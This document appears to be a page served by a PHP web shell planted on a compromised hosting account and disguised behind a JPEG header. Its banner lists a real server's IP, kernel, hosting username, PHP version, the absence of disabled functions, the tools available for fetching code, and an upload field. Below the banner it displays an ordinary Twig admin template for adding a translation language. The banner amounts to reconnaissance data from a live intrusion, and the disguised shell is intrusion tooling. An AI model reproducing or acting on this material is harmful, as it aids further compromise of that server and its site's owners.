����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.222.215.20 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/ideyshare.name.ng/app/views/admin/ajax/ |
Upload File : |
<p>Use the form below to add a new language. Once it's created, you can edit any of the text items into your preferred language.</p> <form id="addTranslationForm" class="form-horizontal form-label-left input_mask"> <div class="form-group"> <label class="control-label col-md-3 col-sm-3 col-xs-12">Language Name:</label> <div class="col-md-9 col-sm-9 col-xs-12"> <input name="translation_name" id="translation_name" type="text" value="{{ translation_name }}" class="form-control"/> </div> </div> <div class="form-group"> <label class="control-label col-md-3 col-sm-3 col-xs-12">Text Direction:</label> <div class="col-md-9 col-sm-9 col-xs-12"> <select name="direction" id="direction" class="form-control"> <option value="LTR"{{ direction == 'LTR'?' SELECTED':'' }}>Left To Right (LTR)</option> <option value="RTL"{{ direction == 'RTL'?' SELECTED':'' }}>Right To Left (RTL)</option> </select> <span class="text-muted"> Note: This is entirely dependant on the theme used, this setting just provides the theme with a request to show text in this direction. If the theme doesn't support this setting, it will be ignored. </span> </div> </div> <div class="form-group"> <label class="control-label col-md-3 col-sm-3 col-xs-12">Language Flag:</label> <div class="col-md-5 col-sm-5 col-xs-12"> <select name="translation_flag" id="translation_flag" class="form-control"> {% for flag in flags %} <option data-content="<img src='{{ CORE_ASSETS_ADMIN_WEB_ROOT }}/images/icons/flags/{{ flag }}'/> {{ flag }}" value="{{ flag }}"{{ translation_flag == flag?' SELECTED':'' }}>{{ flag }}</option> {% endfor %} </select> </div> </div> <div class="form-group"> <label class="control-label col-md-3 col-sm-3 col-xs-12">Language Code:</label> <div class="col-md-5 col-sm-5 col-xs-12"> <select name="language_code" id="language_code" class="form-control"> <option value="">- select -</option> {% for k,languageCode in languageCodes %} <option value="{{ k }}"{{ language_code == k?' SELECTED':'' }}>{{ k|upper }} ({{ languageCode }})</option> {% endfor %} </select> </div> </div> <input name="translation_flag_hidden" id="translation_flag_hidden" type="hidden" value="{{ translation_flag }}.png"/> </form>